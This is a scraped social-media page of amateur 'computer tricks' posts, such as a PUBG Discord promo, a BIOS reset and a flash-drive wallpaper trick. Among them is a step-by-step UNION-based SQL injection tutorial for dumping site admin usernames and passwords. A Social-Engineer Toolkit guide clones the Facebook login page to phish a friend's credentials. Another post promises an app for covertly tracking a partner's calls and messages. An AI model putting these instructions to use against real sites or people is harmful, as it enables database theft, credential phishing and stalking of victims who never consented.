Computer Tricks By The Expert.

Computer Tricks By The Expert. Like This page And know about computer Tricks..

PUBG FREE CUSTOM ROOM WILL START SOON.IF YOU ARE INTERESTED THEN JOIN DISCORD LINK FOR FREE WHICH IS GIVEN BELOW.DISCORD...
12/01/2020

PUBG FREE CUSTOM ROOM WILL START SOON.
IF YOU ARE INTERESTED THEN JOIN DISCORD LINK FOR FREE WHICH IS GIVEN BELOW.

DISCORD LINK- https://discord.gg/anPmkVy
YouTube LINK - https://www.youtube.com/c/IFRAGaming

THIS GAME PLAY WILL START ON LIVE STREAMING ON YOUTUBE
SO GUYES JOIN DISCOR HURRY UP IT'S FREE.

https://youtu.be/YxoVCk_7bfM
30/08/2019

https://youtu.be/YxoVCk_7bfM

Recommendedfor you. This is awsome Computer tricks for hide and lock any videos,photos and important files. watch full video and comment on box if any proble...

http://www.youtube.com/channel/UCCwltNN-kjnoxi2XNrxMDRQSubscribe this channel. And watch More Technical Videos ..
05/08/2017

http://www.youtube.com/channel/UCCwltNN-kjnoxi2XNrxMDRQ

Subscribe this channel. And watch More Technical Videos ..

Dear Subscribers, This channel Created by "Rashid Sheikh" from kanpur . You can watch all tecnicals videos Such as Mobile Apps ( ANDROID, IPHONE, WINDOWS ). ...

08/05/2016

How to reset BIOS password laptop or desktop in 2 min....
The simple way..
If u want to reset or forgot your bios password.
Then remove the CMOS battery will reset your bios password ..Enjoy this tricks...

18/04/2015

How to Add Wallpaper to Your Flash Drive Background

Add Wallpaper to your Flash Drive old empty background. Follow the steps one by one. You Flash Drive will Smart.

Open Notepad [Start – All Programs – Accessrious – Notepad]
Copy the content in the box and paste it in to Notepad

[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image=wallpaper.jpg

Then go to “Save as…”
[File – Save as…]
Type File name : desktop.ini
Set Save as type: All Files (*.*)
Set Encoding: Unicode
Save the file to your Flash drive
Find a wallpaper for your background
Extension should be .jpg , as an example wallpaper.jpg . Sometimes .jpg part may hide.
Rename it to wallpaper
Full name should be wallpaper.jpg
Copy your wallpaper.jpg file to Flash Drive
To see the result, unplug the Flash Drive and plug it again
Open My Computer

18/04/2015

Deep Freeze can protect your computer. To do so, it disables all changes made to the operating system at the next startup

syed... its only for u..!!!

16/04/2015

Hey guys ..
U'r seeing my post if u 'r like my page then I will post "Mobile Tracking App"....

16/04/2015

Hey guys. ..

I'm present after very long time..

I wanna give trick for android , Nokia , iPhone and call tracking u r G.F or B.F phone...

So who want to know how to cell phone tracking ..
e.i
Call
Sms
WhatsApp
Facebook
Viber
Line
etc related apps..

Then like my page..
When 500 like on my page then I will give a "Apps" free for everyone. .... then guys start liking my page.. Computer Tricks By The Expert...

>>SQL Injection in MySQL Databases:-SQL Injection attacks are code injections that exploit the database layer of the app...
04/09/2014

>>

SQL Injection in MySQL Databases:-

SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@
@
@

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name
),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

(It's only for Educational purpose . if anyone miss use this trick then i'm not responsible.. ! So guys be careful..)))

04/07/2014

Like This page And know about computer Tricks..

>Step 1: cd /pentest/exploits/set       (type command then enter)Step 2:  ./set ( Enter)when you'r type the second comma...
27/04/2014

>

Step 1: cd /pentest/exploits/set (type command then enter)

Step 2: ./set ( Enter)

when you'r type the second command and hit enter then show 7 options.

given blow:

1) social Engineering Attacks
2) fast-track pe*******on testing
3) Third part modules
4) update the metasploit framework
5) update the social-engineer toolkit
6) update SET configuration
7) Help, credits , and about

Select 1st option and Enter

open will be new menu options.

enter your choice :
2.Website Attack Vectors and press Enter .

Select Attack Vectors :

2. Site Cloner and press enter

Enter the web site www.facebook.com

then type command "ifconfig" and press enter

copy IP address

and send the ip adress email or chat to frend..

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Open Web Browser and Paste the system ipaddress into Address bar and it will redirect to the facebook login page .
Now Enter your anything to check it will work or not .
FOR EXAMPLE: Here I use
Email : h4x00r
Password:hackingDNA.com

Address

Kanpur
208025

Alerts

Be the first to know and let us send you an email when Computer Tricks By The Expert. posts news and promotions. Your email address will not be used for any other purpose, and you can unsubscribe at any time.

Contact The Business

Send a message to Computer Tricks By The Expert.:

Share